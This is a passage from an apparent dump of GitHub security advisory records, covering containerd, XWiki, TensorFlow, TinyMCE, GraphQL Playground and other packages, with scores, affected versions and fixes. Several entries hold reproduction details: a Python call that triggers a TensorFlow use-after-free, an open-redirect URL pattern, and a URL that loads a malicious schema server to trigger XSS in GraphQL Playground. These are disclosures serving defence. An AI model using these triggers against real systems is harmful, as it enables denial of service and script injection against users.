+* [Open an issue](https://github.com/containerd/containerd/issues/new/choose)
+* Email us at security@containerd.io if you think you’ve found a security bug.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/containerd/containerd/security/advisories/GHSA-c72p-9xmj-rx3w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32760'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/22e9a70c71eff6507be71955947a611f2ed91e6c'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/7ad08c69e09ee4930a48dbf2aab3cd612458617f'}, {'type': 'PACKAGE', 'url': 'https://github.com/containerd/containerd'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.4.8'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.5.4'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDMNDPJJTP3J5GOEDB66F6MGXUTRG3Y3/'}]","{'cwe_ids': ['CWE-668', 'CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-22T20:21:14Z', 'nvd_published_at': '2021-07-19T21:15:00Z'}"
+1.4.0,GHSA-h4m4-pgp4-whgm,2022-10-25T20:25:48Z,2021-07-02T19:19:04Z,,['CVE-2021-32731'],The reset password form reveal users email address,"### Impact
+The reset password form reveals the email address of users just by giving their username.
+
+### Patches
+The problem has been patched on XWiki 13.2RC1.
+
+### Workarounds
+It's possible to manually modify the `resetpasswordinline.vm` to perform the changes made in https://github.com/xwiki/xwiki-platform/commit/0cf716250b3645a5974c80d8336dcdf885749dff#diff-14a3132e3986b1f5606dd13d9d8a8bb8634bec9932123c5e49e9604cfd850fc2
+
+### References
+https://jira.xwiki.org/browse/XWIKI-18400
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Jira XWiki](https://jira.xiwki.org)
+* Email us at [Security ML](mailto:security@xwiki.org)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '13.1'}, {'fixed': '13.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4m4-pgp4-whgm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32731'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/0cf716250b3645a5974c80d8336dcdf885749dff#diff-14a3132e3986b1f5606dd13d9d8a8bb8634bec9932123c5e49e9604cfd850fc2'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-18400'}]","{'cwe_ids': ['CWE-200', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-02T16:39:50Z', 'nvd_published_at': '2021-07-01T19:15:00Z'}"
+1.4.0,GHSA-9pm8-xcj6-2m33,2021-07-28T19:18:32Z,2021-07-26T21:34:52Z,,['CVE-2020-12698'],Missing Authorization in TYPO3 extension,The direct_mail extension through 5.2.3 for TYPO3 has Broken Access Control for newsletter subscriber tables.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'directmailteam/direct-mail'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12698'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2020-005'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T20:48:53Z', 'nvd_published_at': '2020-05-13T13:15:00Z'}"
+1.4.0,GHSA-25gf-8qrr-g78r,2022-08-11T20:43:48Z,2021-07-19T21:21:03Z,,['CVE-2021-32574'],Hashicorp Consul Missing SSL Certificate Validation,HashiCorp Consul before 1.10.1 (and Consul Enterprise) has Missing SSL Certificate Validation. xds does not ensure that the Subject Alternative Name of an upstream is validated.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32574'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-17-consul-s-envoy-tls-configuration-did-not-validate-destination-service-subject-alternative-names/26856'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/releases/tag/v1.10.1'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-09'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/consul'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T17:36:42Z', 'nvd_published_at': '2021-07-17T18:15:00Z'}"
+1.4.0,GHSA-jv2c-mhcq-6wp4,2021-07-27T14:11:22Z,2021-07-28T18:57:39Z,,['CVE-2020-0829'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0829'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0829'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:11:22Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}"
+1.4.0,GHSA-wvhv-rr3v-vhpj,2021-07-27T14:26:27Z,2021-07-28T18:57:11Z,,['CVE-2020-0823'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0823'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0823'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:26:27Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}"
+1.4.0,GHSA-9pq7-rcxv-47vq,2021-07-15T20:24:43Z,2021-07-14T19:10:01Z,,['CVE-2021-27293'],Incorrect Regular Expression in RestSharp,"RestSharp < 106.11.8-alpha.0.13 uses a regular expression which is vulnerable to Regular Expression Denial of Service (ReDoS) when converting strings into DateTimes. If a server responds with a malicious string, the client using RestSharp will be stuck processing it for an exceedingly long time. Thus the remote server can trigger Denial of Service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'RestSharp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '106.11.8-alpha.0.13'}]}], 'database_specific': {'last_known_affected_version_range': '<= 106.11.7'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27293'}, {'type': 'WEB', 'url': 'https://github.com/restsharp/RestSharp/issues/1556'}, {'type': 'WEB', 'url': 'https://github.com/restsharp/RestSharp/commit/be39346784b68048b230790d15333574341143bc'}, {'type': 'WEB', 'url': 'https://restsharp.dev/'}]","{'cwe_ids': ['CWE-185', 'CWE-697'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-13T21:24:43Z', 'nvd_published_at': '2021-07-12T11:15:00Z'}"
+1.4.0,GHSA-xcf7-q56x-78gh,2023-08-30T18:51:53Z,2021-07-26T21:23:49Z,,['CVE-2021-23409'],github.com/pires/go-proxyproto vulnerable to DoS via Connection descriptor exhaustion,"The package `github.com/pires/go-proxyproto` before 0.6.1 is vulnerable to Denial of Service (DoS) via creating connections without the proxy protocol header. While this issue was patched in 0.6.0, the fix introduced additional issues which were subsequently patched in 0.6.1.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pires/go-proxyproto'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23409'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/issues/65'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/issues/75'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/pull/74'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/pull/74/commits/cdc63867da24fc609b727231f682670d0d1cd346'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/pull/76'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/commit/2e44d7a76a851d66890ab341403253afae5caac2'}, {'type': 'PACKAGE', 'url': 'https://github.com/pires/go-proxyproto'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/releases/tag/v0.6.0'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/releases/tag/v0.6.1'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0233'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMPIRESGOPROXYPROTO-1316439'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T17:31:53Z', 'nvd_published_at': '2021-07-21T07:15:00Z'}"
+1.4.0,GHSA-mj9r-wwm8-7q52,2021-06-30T17:43:53Z,2021-07-01T17:00:32Z,,['CVE-2021-32721'],Open Redirect in github.com/AndrewBurian/powermux,"### Impact
+Attackers may be able to craft phishing links and other open redirects by exploiting the trailing slash redirection feature. This may lead to users being redirected to untrusted sites after following an attacker crafted link.
+
+### Patches
+The issue is resolved in v1.1.1
+
+### Workarounds
+There are no existing workarounds.
+You may detect attempts to craft urls that exploit this feature by looking for request paths containing pairs of forward slashes in sequence combined with a trailing slash e.g. `https://example.com//foo/`
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/AndrewBurian/powermux'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/AndrewBurian/powermux/security/advisories/GHSA-mj9r-wwm8-7q52'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32721'}, {'type': 'WEB', 'url': 'https://github.com/AndrewBurian/powermux/commit/5e60a8a0372b35a898796c2697c40e8daabed8e9'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:43:53Z', 'nvd_published_at': '2021-06-29T19:15:00Z'}"
+1.4.0,GHSA-gp6m-vqhm-5cm5,2023-09-01T21:41:16Z,2021-07-02T18:37:31Z,,['CVE-2021-25951'],XML2Dict XML Entity Expansion Vulnerability,XXE vulnerability in 'XML2Dict' version 0.2.2 allows an attacker to cause a denial of service. The parse function does not properly restrict recursive entity references.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'XML2Dict'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25951'}, {'type': 'WEB', 'url': 'https://github.com/mcspring/XML2Dict/tree/master'}, {'type': 'WEB', 'url': 'https://pypi.org/project/XML2Dict/'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25951'}]","{'cwe_ids': ['CWE-611', 'CWE-776'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-01T21:42:31Z', 'nvd_published_at': '2021-06-30T12:15:00Z'}"
+1.4.0,GHSA-r8hm-w5f7-wj39,2021-11-01T20:02:43Z,2021-11-02T15:42:52Z,,[],Cross-site scripting vulnerability in TinyMCE plugins,"### Impact
+A cross-site scripting (XSS) vulnerability was discovered in the URL processing logic of the `image` and `link` plugins. The vulnerability allowed arbitrary JavaScript execution when updating an image or link using a specially crafted URL. This issue only impacted users while editing and the dangerous URLs were stripped in any content extracted from the editor. This impacts all users who are using TinyMCE 5.9.2 or lower.
+
+### Patches
+This vulnerability has been patched in TinyMCE 5.10.0 by improved sanitization logic when updating URLs in the relevant plugins.
+
+### Workarounds
+To work around this vulnerability, either:
+- Upgrade to TinyMCE 5.10.0 or higher
+- Disable the `image` and `link` plugins
+
+### Acknowledgements
+Tiny Technologies would like to thank Yakir6 for discovering this vulnerability.
+
+### References
+https://www.tiny.cloud/docs/release-notes/release-notes510/#securityfixes
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)
+* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.10.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'tinymce/tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.10.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'TinyMCE'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.10.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django-tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tinymce/tinymce/security/advisories/GHSA-r8hm-w5f7-wj39'}, {'type': 'WEB', 'url': 'https://github.com/jazzband/django-tinymce/issues/366'}, {'type': 'WEB', 'url': 'https://github.com/jazzband/django-tinymce/releases/tag/3.4.0'}, {'type': 'PACKAGE', 'url': 'https://github.com/tinymce/tinymce'}, {'type': 'WEB', 'url': 'https://pypi.org/project/django-tinymce/3.4.0/'}]","{'cwe_ids': ['CWE-64', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T20:02:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-92vm-mxjf-jqf3,2022-03-29T22:08:00Z,2021-11-10T20:41:39Z,,['CVE-2021-43572'],Improper Verification of Cryptographic Signature in starkbank-ecdsa,"The `verify` function in the Stark Bank Python ECDSA library (starkbank-ecdsa) 2.0.0 fails to check that the signature is non-zero, which allows attackers to forge signatures on arbitrary messages.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'starkbank-ecdsa'}, 'ecosystem_specific': {'affected_functions': ['ellipticcurve.ecdsa.Ecdsa.verify']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43572'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-python/commit/d136170666e9510eb63c2572551805807bd4c17f'}, {'type': 'PACKAGE', 'url': 'https://github.com/starkbank/ecdsa-python'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-python/releases/tag/v2.0.1'}, {'type': 'WEB', 'url': 'https://research.nccgroup.com/2021/11/08/technical-advisory-arbitrary-signature-forgery-in-stark-bank-ecdsa-libraries/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:23:18Z', 'nvd_published_at': '2021-11-09T22:15:00Z'}"
+1.4.0,GHSA-gpfh-jvf9-7wg5,2021-11-08T22:07:11Z,2021-11-10T18:51:21Z,,['CVE-2021-41220'],Use after free / memory leak in `CollectiveReduceV2`,"### Impact
+The [async implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/collective_ops.cc#L604-L615) of `CollectiveReduceV2` suffers from a memory leak and a use after free:
+
+```python
+import tensorflow as tf
+
+tf.raw_ops.CollectiveReduceV2(
+ input=[],
+ group_size=[-10, -10, -10],
+ group_key=[-10, -10],
+ instance_key=[-10],
+ ordering_token=[],
+ merge_op='Mul',
+ final_op='Div')
+```
+
+This occurs due to the asynchronous computation and the fact that objects that have been `std::move()`d from are still accessed:
+
+```cc
+auto done_with_cleanup = [col_params, done = std::move(done)]() {
+ done();
+ col_params->Unref();
+};
+OP_REQUIRES_OK_ASYNC(c,
+ FillCollectiveParams(col_params, REDUCTION_COLLECTIVE,
+ /*group_size*/ c->input(1),
+ /*group_key*/ c->input(2),
+ /*instance_key*/ c->input(3)),
+ done);
+```
+
+Here, `done` is already moved from by the time `OP_REQUIRES_OK_ASYNC` macro needs to invoke it in case of errors. In this case, we get an undefined behavior, which can manifest via crashes, `std::bad_alloc` throws or just memory leaks.
+
+### Patches
+We have patched the issue in GitHub commit [ca38dab9d3ee66c5de06f11af9a4b1200da5ef75](https://github.com/tensorflow/tensorflow/commit/ca38dab9d3ee66c5de06f11af9a4b1200da5ef75).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, as this version is the only one that is also affected.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}], 'versions': ['2.6.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}], 'versions': ['2.6.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}], 'versions': ['2.6.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gpfh-jvf9-7wg5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41220'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ca38dab9d3ee66c5de06f11af9a4b1200da5ef75'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:07:11Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}"
+1.4.0,GHSA-wx8q-rgfr-cf6v,2021-12-10T18:30:24Z,2021-11-10T18:20:11Z,,['CVE-2021-22565'],Insufficient Granularity of Access Control in github.com/google/exposure-notifications-verification-server,"### Impact
+Users or API keys with permission to expire verification codes could have expired codes that belonged to another realm if they guessed the UUID.
+
+### Patches
+v1.1.2+
+
+### Workarounds
+There are no workarounds, and there are no indications this has been exploited in the wild. Verification codes can only be expired by providing their 64-bit UUID, and verification codes are already valid for a very short period of time (thus the UUID rotates frequently).
+
+### For more information
+Contact exposure-notifications-feedback@google.com","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/google/exposure-notifications-verification-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/google/exposure-notifications-verification-server/security/advisories/GHSA-wx8q-rgfr-cf6v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22565'}, {'type': 'PACKAGE', 'url': 'https://github.com/google/exposure-notifications-verification-server/'}, {'type': 'WEB', 'url': 'https://github.com/google/exposure-notifications-verification-server/releases/tag/v1.1.2'}]","{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-09T21:03:07Z', 'nvd_published_at': '2021-12-09T13:15:00Z'}"
+1.4.0,GHSA-59r9-6jp6-jcm7,2021-11-04T19:36:13Z,2021-11-08T18:06:09Z,,['CVE-2021-41249'],XSS vulnerability in GraphQL Playground from untrusted schemas,"## GraphQL Playground introspection schema template injection attack: Advisory Statement
+
+This is a security advisory for an XSS vulnerability in `graphql-playground`.
+
+A similar vulnerability affects `graphiql`, the package from which `graphql-playground` was forked. There is a corresponding `graphiql` [advisory](https://github.com/graphql/graphiql/security/advisories/GHSA-x4r7-m2q9-69c8).
+
+- [1. Impact](#1-impact)
+- [2. Scope](#2-scope)
+- [3. Patches](#3-patches)
+- [4. Reproducing the exploit](#4-reproducing-the-exploit)
+- [5. Credit](#5-credit)
+- [6. For more information](#6-for-more-information)
+
+### 1. Impact
+
+All versions of `graphql-playground-react` older than `graphql-playground-react@1.7.28` are vulnerable to compromised HTTP schema introspection responses or `schema` prop values with malicious GraphQL type names, exposing a dynamic XSS attack surface that can allow code injection on operation autocomplete.
+
+In order for the attack to take place, the user must load a malicious schema in `graphql-playground`. There are several ways this can occur, including by specifying the URL to a malicious schema in the `endpoint` query parameter. If a user clicks on a link to a GraphQL Playground installation that specifies a malicious server, arbitrary JavaScript can run in the user's browser, which can be used to exfiltrate user credentials or other harmful goals.
+
+### 2. Scope
+
+This advisory describes the impact on the `graphql-playground-react` package. The vulnerability also affects `graphiql`, the package from which `graphql-playground` was forked, with a less severe impact; see the [`graphiql` advisory](https://github.com/graphql/graphiql/security/advisories/GHSA-x4r7-m2q9-69c8) for details. It affects all versions of `graphql-playground-react` older than `v1.7.28`.
+
+This vulnerability was introduced with the first public release of `graphql-playground`, so it impacts both the original legacy `graphql-playground` and the contemporary `graphql-playground-react` npm package. It is most easily exploited on `graphql-playground-react@1.7.0` and newer, as that release added functionality which made it possible to override the endpoint URL via query parameter even if it is explicitly specified in the code.
+
+`graphql-playground-react` is commonly loaded via the `graphql-playground-html` package or a middleware package that wraps it (`graphql-playground-express`, `graphql-playground-middleware-koa`, `graphql-playground-middleware-hapi`, or `graphql-playground-middleware-lambda`). By default, these packages render an HTML page which loads the *latest* version of `graphql-playground-react` through a CDN. If you are using one of these packages to install GraphQL Playground on your domain *and you do not explicitly pass the `version` option to `renderPlaygroundPage` or the middleware function*, then you do not need to take any action to resolve this vulnerability, as the latest version of the React app will automatically be loaded.
+
+`graphql-playground-react` is also commonly loaded via HTML served by Apollo Server. Apollo Server always pins a specific version of `graphql-playground-react`, so if you are using Apollo Server you do need to take action to resolve this vulnerability. See the [Apollo Server advisory](https://github.com/apollographql/apollo-server/security/advisories/GHSA-qm7x-rc44-rrqw) for details.
+
+
+### 3. Patches
+
+`graphql-playground-react@1.7.28` addresses this issue via defense in depth:
+
+- **HTML-escaping text** that should be treated as text rather than HTML. In most of the app, this happens automatically because React escapes all interpolated text by default. However, one vulnerable component uses the unsafe `innerHTML` API and interpolated type names directly into HTML. We now properly escape that type name, which fixes the known vulnerability.
+
+- **Validates the schema** upon receiving the introspection response or schema changes. Schemas with names that violate the GraphQL spec will no longer be loaded. (This includes preventing the Doc Explorer from loading.) This change is also sufficient to fix the known vulnerability.
+
+- **Ensuring that user-generated HTML is safe**. Schemas can contain Markdown in `description` and `deprecationReason` fields, and the web app renders them to HTML using the `markdown-it` library. Prior to `graphql-playground-react@1.7.28`, GraphQL Playground used two separate libraries to render Markdown: `markdown-it` and `marked`. As part of the development of `graphql-playground-react@1.7.28`, we verified that our use of `markdown-it` prevents the inclusion of arbitrary HTML. We use `markdown-it` without setting `html: true`, so we are comfortable relying on [`markdown-it`'s HTML escaping](https://github.com/markdown-it/markdown-it/blob/master/docs/security.md) here. We considered running a second level of sanitization over all rendered Markdown using a library such as `dompurify` but believe that is unnecessary as `markdown-it`'s sanitization appears to be adequate. `graphiql@1.4.3` does update to the latest version of `markdown-it` (v12, from v10) so that any security fixes in v11 and v12 will take effect. On the other hand, [`marked`](https://github.com/markedjs/marked) recommends the use of a separate HTML sanitizer if its input is untrusted. In this release, we switch the one component which uses `marked` to use `markdown-it` like the rest of the app.
+
+**If you are using `graphql-playground-react` directly in your client app**, upgrade to version 1.7.28 or later.
+
+**If you are using `graphql-playground-html` or a package which starts with `graphql-playground-middleware-` in your server** and you are passing the `version` option to a function imported from that package, change that `version` option to be at least `""1.7.28""`.
+
+**If you are using `graphql-playground-html` or a package which starts with `graphql-playground-middleware-` in your server** and you are **NOT** passing the `version` option to a function imported from that package, no action is necessary; your app automatically loads the latest version of `graphql-playground-react` from CDN.
+
+### 4. Reproducing the exploit
+
+We are hosting a ""malicious"" server at https://graphql-xss-schema.netlify.app/graphql . This server has a hard-coded introspection result that includes unsafe HTML in type names.
+
+If you manually change a GraphQL Playground installation to use that endpoint, clear the operation pane, and type `{x` into the operation pane, an alert will pop up; this demonstrates execution of code provided by the malicious server.
+
+An URL like https://YOUR-PLAYGROUND-SERVER/?endpoint=https%3A%2F%2Fgraphql-xss-schema.netlify.app%2Fgraphql&query=%7B will load already configured with the endpoint in question. (This URL-based exploit works on `graphql-playground-react@1.7.0` and newer; older versions may be protected from this particular URL-based exploit depending on their configuration.)
+### 5. Credit
+
+This vulnerability was discovered by [@Ry0taK](https://github.com/Ry0taK), thank you! :1st_place_medal:
+
+Others who contributed:
+
+- extensive help from [@glasser](https://github.com/glasser) at [Apollo](https://github.com/apollographql)
+- [@acao](https://github.com/acao)
+- [@imolorhe](https://github.com/imolorhe)
+- [@divyenduz](https://github.com/divyenduz)
+- [@dotansimha](https://github.com/dotansimha)
+- [@timsuchanek](http://github.com/timsuchanek)
+- [@benjie](https://github.com/Ry0taK) and many others who provided morale support
+
+### 6. For more information
+
+If you have any questions or comments about this advisory:
+
+- The `graphiql` advisory document contains [more information](https://github.com/graphql/graphiql/blob/main/docs/security/2021-introspection-schema-xss.md#2-more-details-on-the-vulnerability) about how both the client-side and server-side vulnerabilities work
+- Open an issue in the [graphql-playground repo](https://github.com/graphql/graphql-playground/new/issues)
